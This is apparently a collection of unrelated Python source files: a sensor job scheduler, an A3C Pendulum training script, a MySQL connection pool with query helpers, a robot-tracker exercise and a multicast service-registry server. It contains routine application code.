self._start_date = arrow.get(start_date, self._date_fmt)
self._end_date = arrow.get(end_date, self._date_fmt)
def has_expired(self) -> bool:
"""Checks whether or not the job has expired."""
now = arrow.now()
if now > self._end_date:
self.logger.debug(f'Job "{self._name}" has expired')
return True
return False
def is_pending(self) -> bool:
"""Checks whether or not the job is within the current time frame and
ready for processing."""
if not self._is_enabled:
return False
now = arrow.now()
# Are we within the date range of the job?
if self._start_date <= now < self._end_date:
# No days defined, go on.
if len(self._weekdays) == 0:
return True
# Name of the current day (e.g., "monday").
current_day = arrow.now().format('dddd').lower()
# Ignore current day if it is not listed in the schedule.
if current_day in self._weekdays:
# Time ranges of the current day.
periods = self._weekdays.get(current_day)
# No given time range means the job should be executed
# all day long.
if len(periods) == 0:
return True
# Check all time ranges of the current day.
if len(periods) > 0:
for period in periods:
# Start and end time of the current day.
start_time = arrow.get(period.get('startTime'),
self._time_fmt).time()
end_time = arrow.get(period.get('endTime'),
self._time_fmt).time()
# Are we within the time range of the current day?
if start_time <= now.time() < end_time:
return True
return False
def run(self) -> None:
"""Iterates trough the observation set and sends observations to an
external callback function."""
# Return if observation is disabled.
if not self._obs.get('enabled'):
return
# Disable the observation if it should run one time only.
if self._obs.get('onetime'):
self._obs.set('enabled', False)
# Make a deep copy, since we don't want to do any changes to the
# observation in our observation set.
obs_copy = copy.deepcopy(self._obs)
# Set the ID of the observation.
obs_copy.set('id', Observation.get_new_id())
# Insert the name of the port module or the virtual sensor at the
# beginning of the receivers list.
receivers = obs_copy.get('receivers')
receivers.insert(0, self._port_name)
obs_copy.set('receivers', receivers)
# Set the next receiver to the module following the port.
obs_copy.set('nextReceiver', 1)
self.logger.info(f'Starting job "{self._obs.get("name")}" for port '
f'"{self._port_name}" ...')
# Get the sleep time of the whole observation.
sleep_time = obs_copy.get('sleepTime', 0)
# Create target, header, and payload in order to send the observation.
target = self._port_name
header = Observation.get_header()
header['from'] = 'job'
payload = obs_copy.data
# Fire and forget the observation.
self._uplink(target, header, payload)
# Sleep until the next observation.
self.logger.debug(f'Next observation starts in {sleep_time} s')
time.sleep(sleep_time)
@property
def is_enabled(self):
return self._is_enabled
@property
def name(self):
return self._name
class Scheduler(Prototype):
"""
Scheduler is used to manage the monitoring process by sending observations
to a sensor. Each observation is represented by a single job. Jobs are
stored in a jobs list and will be executed at the given date and time. A
separate scheduler is necessary for each serial port.
The JSON-based configuration for this module:
Parameters:
port (str): Name of the port module.
sensor (str): Name of the sensor.
schedules (List[Dict]): List of schedules.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
self._config = self.get_module_config('schedulers', self._name)
self._port_name = self._config.get('port')
self._sensor_name = self._config.get('sensor')
self._schedules = self._config.get('schedules')
self._thread = None
self._jobs = []
def add(self, job: Job) -> None:
"""Appends a job to the jobs list.
Args:
job: Job to add.
"""
self._jobs.append(job)
self.logger.debug(f'Added job "{job.name}" to scheduler "{self._name}"')
def load_jobs(self) -> None:
"""Loads all observation sets from the configurations and creates jobs
to put into the jobs list."""
# Run through the schedules and create jobs.
for schedule in self._schedules:
observations = schedule.get('observations')
# Get all observations of the current observation set.
for obs_name in observations:
obs = self._sensor_manager.get(self._sensor_name)\
.get_observation(obs_name)
if not obs:
self.logger.error(f'Observation "{obs_name}" not found')
continue
# Add sensor name to the observation.
obs.set('sensorName', self._sensor_name)
# Add project and node id.
obs.set('pid', self._project_manager.project.id)
obs.set('nid', self._node_manager.node.id)
# Create a new job.
job = Job(obs_name,
self._port_name,
obs,
schedule.get('enabled'),
schedule.get('startDate'),
schedule.get('endDate'),
schedule.get('weekdays'),
self.publish)
# Add the job to the jobs list.
self.add(job)
def run(self) -> None:
"""Threaded method to process the jobs queue."""
self.load_jobs()
zombies = []
# FIXME: Wait for uplink connection.
sleep_time = 5.0
self.logger.verbose('Starting jobs in {:3.1f} s ...'.format(sleep_time))
time.sleep(sleep_time)
while self.is_running:
t1 = time.time()
for job in self._jobs:
if job.has_expired():
zombies.append(job)
continue
if not job.is_enabled:
continue
if job.is_pending():
job.run()
# Remove expired jobs from the jobs list.
while zombies:
zombie = zombies.pop()
self._jobs.remove(zombie)
self.logger.debug(f'Deleted expired job "{zombie.name}"')
t2 = time.time()
dt = t2 - t1
if dt < 0.1:
time.sleep(0.1 - dt)
def start(self) -> None:
if self._is_running:
return
super().start()
# Run the method `run()` inside a thread.
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
|
a3c_for_pendulum.py
|
import threading
import multiprocessing
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
import time
GAME = 'Pendulum-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_EP_STEP = 200
MAX_GLOBAL_EP = 4000 # 2000 4000
GLOBAL_NET_SCOPE = 'Global_Net'
GAMMA = 0.9
UPDATE_GLOBAL_ITER = 100
ENTROPY_BETA = 0.01 # 0.01 0.001
LR_A = 0.0001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
# LR_A = 0.001 # learning rate for actor
# LR_C = 0.002 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high] # bound of output action
class ACNet:
# This class is to define the global actor-critic and local actor-critics
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
# Get parameters of the actor and critic in global network
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
# to minimize TD-error
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
mu, sigma = mu * A_BOUND[1], sigma + 1e-4
# distribution of parameters:mu, sigma
normal_dist = tf.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his) # log pi(a)
exp_v = log_prob * tf.stop_gradient(td)
entropy = normal_dist.entropy() # encourage exploration:larger entropy means more stochastic actions
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
# to maximize tf.reduce_mean(self.exp_v) <=> to minimize tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=[0, 1]), A_BOUND[0], A_BOUND[1])
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'): # 把主网络的参数赋予各子网络
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'): # 使用子网络的梯度对主网络参数进行更新
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return mu, sigma, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s):
# run by a local: choose action from normal distributions
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker:
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC=globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
for ep_t in range(MAX_EP_STEP):
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
done = True if ep_t == MAX_EP_STEP - 1 else False
r /= 10 # normalize reward
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, feed_dict={self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_ # 使用v(s) = r + v(s+1)计算target_v
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(
buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target
}
self.AC.update_global(feed_dict) # push local gradients to global net
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global() # pull the newest global params to local
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(self.name, "Ep:", GLOBAL_EP, "| Ep_r: %i" % GLOBAL_RUNNING_R[-1])
GLOBAL_EP += 1
break
if __name__ == '__main__':
SESS = tf.Session()
with tf.device("/cpu:0"):
# define two optimizers for actors and critics in local net
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its parameters
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = "W_%i" % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
# Coordinator类用来管理在Session中的多个线程,
# 使用 tf.train.Coordinator()来创建一个线程管理器(协调器)对象。
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
start_time = time.time()
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job) # 创建一个线程,并分配其工作
t.start() # 开启线程
worker_threads.append(t)
COORD.join(worker_threads) # 把开启的线程加入主线程,等待threads结束
env.close()
print("%d线程耗时:" % N_WORKERS, str(time.time() - start_time), 's')
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
suit.py
|
#!/usr/bin/env python
# coding=utf-8
import time
import functools
import threading
try:
from webcrawl.queue.lib import queue
except:
import Queue as queue
threading.queue = queue
import weakref
import traceback
import sys
import handler
from . import CFG
from .. import singleton
from ..util import transfer
from error import ConnectionNotInPoolError, \
ConnectionPoolOverLoadError, \
ClassAttrNameConflictError, \
ConnectionNotFoundError, \
ConnectionNameConflictError
MINLIMIT = 10
MAXLIMIT = 40
ORDER = {1:'asc', -1:'desc'}
customattrs = lambda cls:[attr for attr in dir(cls) if not attr.startswith('_')]
class DBConnect(handler.DBHandler):
def __init__(self, settings, autocommit=False, resutype='TUPLE'):
super(DBConnect, self).__init__('', handler.dblib.connect(**settings), resutype=resutype, autocommit=autocommit)
class DBPool(object):
def __init__(self, markname, minlimit=MINLIMIT, maxlimit=MAXLIMIT, **settings):
self.markname = markname
self.minlimit = minlimit
self.maxlimit = maxlimit
self.settings = settings
self._lock = threading.Lock()
self.queue = threading.queue.Queue(self.maxlimit)
self._openconnects = []
self._liveconnects = 0
self._peakconnects = 0
def __repr__(self):
return "<%s::%s>" % (self.__class__.__name__, self.markname)
@property
def alive(self):
return self._liveconnects
@property
def peak(self):
return self._peakconnects
def clearIdle(self):
while self.queue.qsize() > self.minlimit:
connect = self.queue.get()
connect.close()
del connect
with self._lock:
self._liveconnects -= 1
def connect(self):
if self.queue.empty():
with self._lock:
if self._liveconnects >= self.maxlimit:
raise ConnectionPoolOverLoadError("Connections of %s reach limit!" % self.__repr__())
else:
self.queue.put(handler.dblib.connect(**self.settings))
self._liveconnects += 1
connect = self.queue.get()
else:
try:
connect = self.queue.get()
connect.ping()
except:
del connect
connect = handler.dblib.connect(**self.settings)
self._appendOpenconnect(connect)
return connect
def release(self, conn):
self._removeOpenconnect(conn)
with self._lock:
try:
conn.rollback()
except handler.dblib.OperationalError:
print "connection seems closed, drop it."
else:
self.queue.put(conn)
finally:
pass
self.clearIdle()
def _appendOpenconnect(self, conn):
with self._lock:
self._openconnects.append(conn)
if self._peakconnects < len(self._openconnects):
self._peakconnects = len(self._openconnects)
def _removeOpenconnect(self, conn):
with self._lock:
try:
self._openconnects.remove(conn)
except Exception:
raise ConnectionNotInPoolError("Connection seems not belong to %s" % self.__repr__())
@singleton
class DBPoolCollector(object):
def __init__(self, handler=None, delegate=False):
"""
Global DBPoolCollector with specific connection handler,
call DBPoolCollector.connect to passing the mysql connection to this handler
and use DBPoolCollector.db access
current database connection wrapper class.
:param handler:
:return:
"""
self._handler = handler
self._collection = {}
# self._instance_lock = threading.Lock()
self._current = None
# self._lock = threading.Lock()
# the queue stores available handler instance
# with self._instance_lock:
# self._instance = self
self.setDelegate(delegate)
def __getattr__(self, attr):
if not self._delegate or (attr.startswith('_') or not hasattr(self._current,"handler")):
return self.__getattribute__(attr)
else:
return getattr(self._current.handler, attr)
def setDelegate(self, delegate):
if delegate:
if set(customattrs(self._handler)).intersection(set(customattrs(self))):
raise ClassAttrNameConflictError("If open delegate, ConnectionHandler's attr name should not appear in DBPoolCollector")
self._delegate = True
else:
self._delegate = False
def addDB(self, markname, minlimit=MINLIMIT, maxlimit=MAXLIMIT, **settings):
"""
:param markname: string database name
:param settings: connection kwargs
:return:
"""
if self._current is None:
self._current = threading.local()
self._current.connect = None
self._current.markname = None
self._current.handler = None
override = settings.pop("override", False)
if not override and self._collection.has_key(markname):
msg = "Alreay exist connection '%s',override or rename it." % markname
print msg
# raise ConnectionNameConflictError(msg)
else:
self._collection[markname] = DBPool(markname, minlimit, maxlimit, **settings)
def deleteDB(self, markname):
"""
:param markname: string database name
"""
if self._current.markname == markname:
self.release()
if hasattr(self._collection, markname):
del self._collection[markname]
def connect(self, markname, resutype='TUPLE', autocommit=False):
"""
Mapping current connection handler's method to DBPoolCollector
:return:
"""
if not hasattr(self._current, "connect") or self._current.connect is None:
self._current.connect = self._collection[markname].connect()
self._current.markname = markname
self._current.handler = handler.DBHandler(markname, self._current.connect, resutype=resutype, autocommit=autocommit, db=self._collection[markname].settings['db'])
self._current.connect._cursor = weakref.proxy(self._current.handler._curs)
else:
try:
self._current.connect.ping()
if handler.dbtype == 1:
self._current.handler._curs._connection = weakref.proxy(self._current.connect)
else:
self._current.handler._curs.connection = weakref.proxy(self._current.connect)
except:
self._current.connect = handler.dblib.connect(**self._collection[markname].settings)
self._current.handler = self._handler(markname, self._current.connect, resutype=resutype, autocommit=autocommit, db=self._collection[markname].settings['db'])
self._current.connect._cursor = weakref.proxy(self._current.handler._curs)
# raise AlreadyConnectedError("Database:'%s' is already connected !" % markname)
def release(self):
"""
:return:
"""
# print "start...", self._current.markname, self._current.connect
if hasattr(self._current, 'connect') and self._current.connect is not None:
self._collection[self._current.markname].release(self._current.connect)
del self._current.handler, self._current.connect
# print "end..."
@property
def handler(self):
if hasattr(self._current, 'handler') and self._current.handler is not None:
return weakref.proxy(self._current.handler)
else:
return None
# @staticmethod
# def instance():
# if not hasattr(DBPoolCollector, "_instance"):
# with DBPoolCollector._instance_lock:
# if not hasattr(DBPoolCollector, "_instance"):
# DBPoolCollector._instance = DBPoolCollector()
# return DBPoolCollector._instance
dbpc = DBPoolCollector(handler.DBHandler, delegate=True)
# dbpc = None
def withMysql(mark, resutype='TUPLE', autocommit=False):
"""
:param markname:
:return:the decorator with specific db connection
"""
def wrapped(fun):
@functools.wraps(fun)
def wrapper(*args, **kwargs):
if hasattr(mark, '__call__'):
markname = mark()
else:
markname = mark
if not dbpc._collection.has_key(markname):
raise ConnectionNotFoundError("Not found connection for '%s', use dbpc.addDB add the connection" % markname)
if dbpc.handler is None:
dbpc.connect(markname, resutype=resutype, autocommit=autocommit)
try:
res = fun(*args, **kwargs)
except:
raise
finally:
dbpc.release()
return res
return wrapper
return wrapped
@withMysql(CFG.R, resutype='DICT')
def withMysqlCount(table, spec):
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
if where:
where = 'where %s' % where
return dbpc.handler.queryOne('select count(*) as total from `%s` %s' % (table, where), [args[index][one] for index, one in enumerate(keys)])['total']
@withMysql(CFG.R, resutype='DICT')
def withMysqlQuery(table, spec, projection={}, sort=[], skip=0, limit=10, qt='all'):
"""
:param markname:
:return:the decorator with specific db connection
"""
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
if projection:
projection['_id'] = projection.get('_id', 1)
projection = ['id' if k == '_id' else k for k, v in projection.items() if v == 1]
projection = ','.join(['`%s` as _id' % c if c == 'id' else '`%s`' % c for c in projection])
else:
projection = '*, `id` as `_id`'
if sort:
sort = 'order by ' + ','.join(['%s %s' % (one[0], ORDER.get(one[-1], 'asc')) for one in sort])
else:
sort = ''
if where:
where = 'where %s' % where
if qt.lower() == 'all':
return dbpc.handler.queryAll('select %s from `%s` %s %s limit %d, %d' % (projection, table, where, sort, skip, limit), [args[index][one] for index, one in enumerate(keys)])
else:
return dbpc.handler.queryOne('select %s from `%s` %s %s limit %d, %d' % (projection, table, where, sort, 0, 1), [args[index][one] for index, one in enumerate(keys)])
@withMysql(CFG.W, autocommit=True)
def withMysqlInsert(table, doc, keycol, update=True):
items = doc.items()
items.sort(lambda x,y:cmp(x[0], y[0]))
if update:
_insertsql = 'insert into `%s` (%s) ' % (table, ','.join('`'+one[0]+'`' for one in items)) + 'values (%s)' % ','.join('%s' for one in items) + ' on duplicate key update %s' % ','.join('`'+one+'`=values(`'+one+'`)' for one in keycol if not one == 'create_time')
else:
_insertsql = 'insert ignore into `%s` (%s) ' % (table, ','.join('`'+one[0]+'`' for one in items)) + 'values (%s)' % ','.join('%s' for one in items)
one = tuple([i[1] for i in items])
return dbpc.handler.insert(_insertsql, one)
@withMysql(CFG.W, autocommit=True)
def withMysqlDelete(table, spec):
if spec == {}:
raise Exception("Wrong delete spec.")
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
dbpc.handler.delete('delete from `%s` where %s' % (table, where), [args[index][one] for index, one in enumerate(keys)])
@withMysql(CFG.W, autocommit=True)
def withMysqlUpdate(table, spec, doc):
if spec == {}:
raise Exception("Wrong update spec.")
for k in doc:
if not k in ('$set', '$inc'):
raise Exception("Wrong update doc, only assist $set and $inc.")
sets = doc.get('$set', {}).items()
if sets:
resets = [','.join('`'+one[0]+'`=%s' for one in sets)]
else:
resets = []
incs = doc.get('$inc', {}).items()
incs = ','.join('`%s`=`%s`+%d' % (one[0], one[0], one[1]) for one in incs)
if incs:
resets.append(incs)
keys = []
args = []
where = transfer(spec, grand=None, parent='', index=keys, condition=args)
dbpc.handler.update('update `%s` set %s where %s' % (table, ','.join(resets), where), [one[1] for one in sets] + [args[index][one] for index, one in enumerate(keys)])
if __name__ == "__main__":
dbpc.addDB("local", 1, host="127.0.0.1",
port=3306,
user="root",
passwd="",
db="kuaijie",
charset="utf8",
use_unicode=False,
override=False)
@withMysql('local')
def test1():
for one in dbpc.handler.showColumns('hotel_info_collection'):
# print ''
pass
@withMysql('local')
def test2():
for one in dbpc.handler.showColumns('hotel_info_original'):
# print ''
pass
@withMysql('local')
def test3():
for one in dbpc.handler.showColumns('hotel_info_mapping'):
pass
# print ''
from threading import Thread
a = Thread(target=test1)
b = Thread(target=test2)
c = Thread(target=test3)
a.start()
# a.join()
b.start()
# b.join()
c.start()
# c.join()
a.join()
b.join()
c.join()
|
Problem3_4.py
|
# -*- coding: utf-8 -*-
from RobotTracker import *
import time
from threading import Thread, Event
def Problem3():
repeatCounter = 0
time.sleep(1)
counter = 0
oneFound = False
twoFound = False
threeFound = False
fourFound = False
############################################################################################
# drive to point
r.displayGoals = True
t1 = time.time()
cv2.putText(r.textArea, "Amazon is adding new drone routes to Nashville! They need", (0, 80), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "coordinates for some of the locations, help them out by", (0, 95), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "driving the robot to each new location in one sequence.", (0, 110), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "You should probably start at the Amazon warehouse, right?", (0, 160), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "Remember, you want to find the shortest path possible.", (0, 190), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "The coordinates of the points are now shown.", (0, 220), 2, .5, (100,200,100), 1)
cv2.putText(r.textArea, "Nice Work!", (0, 300), 4, 1.2, (100,200,100), 1)
## print("first, enter the coordinates for the Amazon Warehouse, location 1")
## print("ex, if the coordinates are (5,5), enter 5,5 without parentheses")
## userIn = input("> ")
## while(userIn != "2,-2"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is positive and y is negative...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
## print("Great!")
##
## print("enter the coordinates for the office1, location 2")
## userIn = input("> ")
## while(userIn != "2,1"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is positive and y is positive...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
##
## print("enter the coordinates for the office2, location 3")
## userIn = input("> ")
## while(userIn != "-2,1"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is negative and y is positive...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
##
## print("enter the coordinates for the office3, location 4")
## userIn = input("> ")
## while(userIn != "1,4"):
## if(repeatCounter == 0):
## print("double check your entry...")
## repeatCounter += 1
## elif(repeatCounter == 1):
## print("x is positive and y is positive...")
## repeatCounter += 1
## elif(repeatCounter == 2):
## print("maybe you need some extra assistance...")
## userIn = input("> ")
r.displayGoalLoc = True
## while(counter != 4):
## time.sleep(2)
## if(r.location == str(r.points[0]) and oneFound == False):
## counter += 1
## oneFound = True
## if(r.location == str(r.points[1]) and twoFound == False):
## counter += 1
## twoFound = True
## if(r.location == str(r.points[2]) and threeFound == False):
## counter += 1
## threeFound = True
## if(r.location == str(r.points[3]) and fourFound == False):
## counter += 1
## fourFound = True
##
#cv2.putText(r.textArea, "Nice Work!", (0, 300), 4, 1.2, (100,200,100), 1)
repeatCounter = 0
time.sleep(20)
r.displayGoals = False
r.displayGoalLoc = False
r.textArea = np.zeros((r.frame.shape[0],550,3),dtype=np.uint8)
r.finished = True
if (__name__ == "__main__"):
r = Robot()
r.displayGoals = False
problemThread = Thread(target=Problem3)
problemThread.isDaemon = True
problemThread.e = Event()
problemThread.start()
r.Run()
problemThread.e.set()
problemThread.join()
|
core.py
|
# -*- coding: utf-8 -*-
##############################################
# The MIT License (MIT)
# Copyright (c) 2014 Kevin Walchko
# see LICENSE for full details
##############################################
#
#
import threading
import time
from pygecko.network.ip import get_ip
# from pygecko.network.transport import Ascii
from pygecko.network.mcsocket import MultiCastSocket
from pygecko.network.mcsocket import MultiCastError
# import psutil
import multiprocessing as mp
from colorama import Fore, Style
class CoreServer:
mcast_addr = '224.0.0.1'
mcast_port = 11311
timeout = 2
ttl = 2
services = {} # services
perf = {}
exit = False
pubs = {}
subs = {}
print = True
bind = {}
conn = {}
def __init__(self, key, handler, ttl=2, addr=None, print=True):
if addr is not None:
if len(addr) == 2:
self.mcast_addr = addr[0]
self.mcast_port = addr[1]
self.group = (self.mcast_addr, self.mcast_port)
try:
self.sock = MultiCastSocket(group=self.group, ttl=ttl, timeout=1)
except MultiCastError as e:
print("*** {} ***".format(e))
raise e
self.key = key
self.host_ip = get_ip()
self.pid = mp.current_process().pid
# setup server data
self.handler = handler() # serialization method
# setup thread
self.listener = threading.Thread(target=self.printLoop)
def printLoop(self):
while not self.exit:
if True:
self.print()
time.sleep(3)
def start(self):
"""Start the listener thread"""
self.listener.setDaemon(True)
self.listener.start()
def stop(self):
"""Stop the listener thread"""
self.exit = True
def printProcess(self, pids, bind=False):
# grab a snapshot of the values
procs = tuple(pids.values())
for ps, topic in procs:
# print(pid)
# print(ps)
# print(topic)
try:
if ps.is_running():
# faster or better?
# p.cpu_percent(interval=None)
# p.memory_percent(memtype="rss")
pd = ps.as_dict(attrs=['connections', 'cpu_percent', 'memory_percent'])
# net[psname] = pd['connections']
# print(psname, pd['connections'])
# cpu = ps.cpu_percent()
# cpu = cpu if cpu else -1
# mem = ps.memory_percent()
# mem = mem if mem else -1
label = '[{:>5}] {}'.format(ps.pid, topic)
print(' {:.<30} cpu:{:5.1f}% mem:{:5.1f}%'.format(label, pd['cpu_percent'], pd['memory_percent']))
# print('| {:.<30} cpu: {:5}% mem: {:6.2f}%'.format(label, cpu, mem))
else:
# print('*** remove {} ***'.format(ps.pid))
pids.pop(ps.pid)
if bind: self.services.pop(topic)
except Exception as e:
print("*** printProcess: {} ***".format(e))
pids.pop(ps.pid)
if bind: self.services.pop(topic)
# except:
# pids.pop(pid)
# pass
def print(self):
print(" ")
print("="*40)
print(" Geckocore [{}]".format(self.pid))
print("-------------")
print(" Key: {}".format(self.key))
print(" Host IP: {}".format(self.host_ip))
print(" Listening on: {}:{}".format(self.mcast_addr, self.mcast_port))
print("-------------")
print('Known Services [{}]'.format(len(self.services)))
for k, v in self.services.items():
print(" * {:.<30} {}".format(k+':', v))
print("\nBinders [{}]".format(len(self.pubs)))
self.printProcess(self.pubs, True)
print("\nConnections [{}]".format(len(self.subs)))
self.printProcess(self.subs)
print(" ")
def handle_conn(self, data):
# print("handle_sub")
# print(data)
# print(self.services.keys())
# print("handle_conn:", data)
# print("handle_conn 0:", data[0])
# print("handle_conn 1:", data[1])
# print("handle_conn 2:", data[2])
ret = None
topic = data[1]
pid = int(data[2])
if topic in self.services.keys():
endpt = self.services[topic]
ret = (self.key, topic, endpt, "ok")
# self.subs[pid] = (psutil.Process(pid), topic,)
print(Fore.CYAN + ">> CONN[{}] {}:{}".format(pid, topic, endpt) + Style.RESET_ALL)
# else:
# print("*** handle_sub FAILURE ***")
# print(">> handle_sub:", ret)
return ret
def handle_bind(self, data):
# print("handle_bind:", data)
# print("handle_bind 0:", data[0])
# print("handle_bind 1:", data[1])
# print("handle_bind 2:", data[2])
# print("handle_bind 3:", data[3])
topic = data[1]
pid = int(data[2])
endpt = data[3]
self.services[topic] = endpt
# self.pubs[pid] = (psutil.Process(pid), topic,)
print(Fore.MAGENTA + ">> BIND[{}] {}:{}".format(pid, topic, endpt) + Style.RESET_ALL)
return (self.key, topic, endpt, "ok",)
def run(self): # FIXME: remove
self.listen()
def listen(self):
while not self.exit:
self.loopOnce()
def loopOnce(self):
try:
data, address = self.sock.recv()
# print("run:", address, data)
if data:
data = self.handler.loads(data)
if self.key == data[0]:
msg = None
if self.key == data[0]:
if len(data) == 3:
msg = self.handle_conn(data)
elif len(data) == 4:
if data[3] != "ok":
msg = self.handle_bind(data)
# else:
# print("*** wtf ***")
if msg:
msg = self.handler.dumps(msg)
# self.sock.sendto(msg, address)
self.sock.cast(msg)
# time.sleep(0.01)
# if msg:
# msg = self.handler.dumps(msg)
# self.sock.sendto(msg, address)
# print(">> beacon sent: {}".format(msg))
except KeyboardInterrupt:
print("ctrl-z")
self.exit = True
return
# except Exception as e:
# print("*** run: {} ***".format(e))
# continue
######################################################
# class BeaconFinder(BeaconBase):
# """
# Find Services using the magic of multicast
#
# pid = 123456
# proc_name = "my-cool-process"
# key = hostname
# finder = BeaconFinder(key)
# msg = finder.search(msg)
# """
# def __init__(self, key, ttl=1, handler=Pickle):
# BeaconBase.__init__(self, key=key, ttl=ttl)
# self.handler = handler()
#
# def send(self, msg):
# """
# Search for services using multicast sends out a request for services
# of the specified name and then waits and gathers responses. This sends
# one mdns ping. As soon as a responce is received, the function returns.
# """
# # serviceName = 'GeckoCore'
# self.sock.settimeout(self.timeout)
# # msg = self.handler.dumps((self.key, serviceName, str(pid), processname,))
# # msg['key'] = self.key
# msg = self.handler.dumps(msg)
# self.sock.sendto(msg, self.group)
# servicesFound = None
# while True:
# try:
